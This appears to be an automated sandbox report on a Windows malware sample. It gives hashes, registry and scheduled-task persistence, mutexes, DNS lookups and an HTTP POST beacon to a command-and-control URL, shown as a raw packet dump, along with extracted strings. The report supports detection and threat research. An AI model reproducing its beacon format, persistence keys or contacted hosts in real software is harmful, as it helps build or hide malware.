Analysis Date: 2014-09-30 23:06:16
MD5: 37f85872575fd0d288528e7cceb4fddf
SHA1: 2adc37e08f2b81c5f77e162d40af733830378af5

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 55926d550f2bb237066be377573390ca sha1: aa0cbd907e43ad2961a051fc735b4e2136f28734 size: 13312
SectionDATA md5: fb1be640015d1b4f8df6ea4e4481c5be sha1: 13d48731fefb97719970cf4acde195aefb3ef2bf size: 154112
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: 1eb915365158a1b0e0bbecfa0fb7add0 sha1: df4cd276a05a2a1b0ad2d20a73c7a03a8f354953 size: 2048
Section.edata md5: 2f866a82d6a39e0479ff858660468a41 sha1: 2136780843a4de5db50504060b3deb5349d63876 size: 512
Section.reloc md5: 6276dd8d39fea6573832745e871d8b27 sha1: 8901094916824fa560beed1d479283ce0e4a6fb1 size: 1024
Section.rsrc md5: eca8f29f807e5ed2a7e09e198483e73a sha1: d14b0bd5cc030e7732c977f110fc16ffd946d45b size: 1024
Timestamp: 1992-06-19 22:22:17 (this fixed value, together with the CODE/DATA/BSS section names listed above, is characteristic of Borland Delphi/C++Builder-linked PEs — treat it as a toolchain artifact, not as the real build date)
PEhash: eb23b11017750228bb69d904dbc17a89724fecb9
IMPhash: d1d53603936afe83b9f03c34b2adcf44

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82} (both GUID-style mutex names are created again by the second process instance below; fixed mutex names like these are usable as host-based indicators)

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Q7NZMT7RLB ➝
C:\malware.exe (user-level autorun persistence; the value name Q7NZMT7RLB is also used as the sample's own key name under HKCU\Software below, so it looks like a per-sample generated identifier and may differ between infections)
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Q7NZMT7RLB\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00 (base64-looking blob written under the sample's own key; its contents are not decoded in this report and are presumably encrypted configuration or state — verify before relying on it)
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job (a Task Scheduler job file — a second persistence mechanism alongside the Run key; the task's trigger and command line are not captured in this report)
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex (together with the index.dat files above and the Internet Settings registry reads, this indicates the HTTP traffic below is sent through WinINet)
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: lacvictoria.com
Winsock DNS: qqplot.com

Network Details:

DNS: wp.pl
Type: A
212.77.100.101
DNS: spankwire.com
Type: A
94.199.252.72
DNS: 51.la
Type: A
117.21.226.199
(wp.pl, spankwire.com and 51.la are high-traffic public sites; no flow to any of them appears below, so these lookups may be connectivity checks rather than C2 — unconfirmed)
DNS: qqplot.com
Type: A
109.74.195.149
DNS: lacvictoria.com
Type: A
(no A record recorded in this run)
DNS: paulo-fg.com
Type: A
(no A record recorded in this run)
DNS: bonreligion.com
Type: A
(no A record recorded in this run)
HTTP POST: http://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) (static legacy UA string — usable as a network indicator when paired with the POST path; see raw pcap below)
Flows TCP: 192.168.1.1:1031 ➝ 109.74.195.149:80 (the only outbound flow recorded; the POST body is a single base64-looking `data=` parameter of Content-Length 341 that is not decoded in this report — likely a check-in/beacon to qqplot.com, though the server response is not shown)

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c74554d 31757932   SvxqCiK0ltUM1uy2
0x00000110 (00272)   2f797534 55355970 4e6d3176 2f2f6a54   /yu4U5YpNm1v//jT
0x00000120 (00288)   6e675663 2b774d73 2b2b5a42 6a375a53   ngVc+wMs++ZBj7ZS
0x00000130 (00304)   59547233 69426b47 2f672b37 5643432f   YTr3iBkG/g+7VCC/
0x00000140 (00320)   3070426a 674f4870 37655263 48506959   0pBjgOHp7eRcHPiY
0x00000150 (00336)   6f393949 4d55756a 67555734 62765449   o99IMUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   492b3567 366e3336 642f3334 6b6f4656   I+5g6n36d/34koFV
0x00000240 (00576)   30614b51 692f513d 3d                  0aKQi/Q==


Strings (mostly binary residue; notable readable items below: an embedded application manifest that names itself "Windows Setup UAC" and requests requestedExecutionLevel="highestAvailable", i.e. the sample asks for UAC elevation at launch; and imported names including VirtualAllocEx, TerminateProcess and the wtsapi32 WTSEnumerate*/WTSLogoffSession session-management functions — no injection into other processes or session manipulation appears in the runtime trace above, so treat these as capability hints only)
7.4|:qU..
..L&.....
f@.Q.!....
..J.2..
<
.MA...h
.D
I~
.+..|r.#;...7(..
,sq.C

~$$,
,0RN
10'Y
2"0=
@2dI
45]@
4e"B&
5##?
75PT
~7!j
7pl3
9D+Y
^	$a
^A8d
}axU
b,48
b'qe
\{ce
^@cw
DMcL
efsV
EQ=n
ETU{
}EY!
f4`[
fB:|
\F"t
Gc[^
g_#l
gx(~>
hmBC
h,TY
IFN8
J,:G
jzt#
k3#2
kC8q
Ki=a
KISb
lm4W<
mHmc
M|r-
N5I')
@!;O
O8Kz
O)Cd
>!oH)
o'L;5
+P?6n
p}B%
qb6 
qK*w
Qy}6
} R`	
R&,=
+	rH_
'r'O
!+rV
|$ @S
s9N$cj
 T?i
?-.U7I
Un_rJ
=uU^
>V{fm
&wtiQ
w	^Wa
XO'\%
Y9G)o
ypQ?
0$0*00060<0B0H0N0T0Z0`0f0l0r0x0~0
0T\p#k
0<u---
120983218
2"2*222:2B2J2R2Z2b2r2z2
283>3(4
3"3*323:3B3J3R3Z3b3j3r3z3
?4?:?@?F?L?R?X?^?d?j?p?v?|?
6n6u6,9s9
6N7c7t7
8,889?9!;(;Y=`=p=
8cc3866
AbortDoc
accept
  </application> 
  <application> 
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
B:]0{#f
BringWindowToTop
CallNamedPipeA
ChildWindowFromPoint
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CopyFileExA
CopyFileExW
CreateFileW
CreateHardLinkW
D9H9L9P9T9X9\9x9|9
DefFrameProcW
DEfggy0
DestroyCaret
.edata
EqualRect
FlushConsoleInputBuffer
gdi32.dll
GetFileSizeEx
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetFileVersionInfoSizeW
GetModuleHandleA
getnameinfo
GetProcAddress
GetSysColorBrush
GetSystemDefaultLCID
GetWindowTextA
GetWindowThreadProcessId
;H<O<Q=
.idata
inet_addr
IntersectRect
kernel32.dll
"~l.---
LoadLibraryA
LocalAlloc
LocalFree
LWX~Cp
OffsetRect
OpenAs_RunDLLW
O+q}4X1
:+:<:P:{:
PathMakeUniqueName
PifMgr_CloseProperties
P.reloc
P.rsrc
PtInRect
regapi.dll
RegenerateUserEnvironment
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
>S6^tu
      </security>
      <security>
SetLocaleInfoW
SetWindowTextA
SHChangeNotifyDeregister
shell32.dll
ShellExec_RunDLLW
SHFileOperation
SHFlushSFCache
SHGetNewLinkInfoA
SHOpenPropSheetW
SHPathPrepareForWriteW
SHSimpleIDListFromPath
sNHLs3bb
StrChrIW
StrCmpNIW
StringX
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
TerminateProcess
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
Ti, W~
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
UnionRect
user32.dll
VerFindFileA
VerInstallFileA
VerLanguageNameA
VerQueryValueA
VerQueryValueW
version.dll
VirtualAllocEx
WIQr(cb
ws2_32.dll
WSAAsyncGetHostByName
WSACloseEvent
WSAConnect
WSAEnumNetworkEvents
WSAEventSelect
WSAHtonl
WSCInstallNameSpace
wtsapi32.dll
WTSEnumerateProcessesA
WTSEnumerateServersA
WTSEnumerateSessionsA
WTSLogoffSession
WTSOpenServerA
WTSQuerySessionInformationW
WTSVirtualChannelRead
WTSWaitSystemEvent
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
"$	XU7
!z9 +4
Z^xonXDI